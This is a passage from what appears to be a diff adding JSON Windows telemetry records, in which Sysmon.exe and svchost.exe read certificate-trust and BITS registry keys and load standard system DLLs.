"CoreMessaging.dll", + "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 
131883570901520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": 
"CTLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901680000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570901840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", + "timestamp": 131883570901840000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", + "registry_value": "BITS", + "timestamp": 131883570901840000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "twinapi.appcore.dll", + "image_path": "C:\\Windows\\System32\\twinapi.appcore.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + 
"registry_value": "Software Publishing", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": 
"CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + 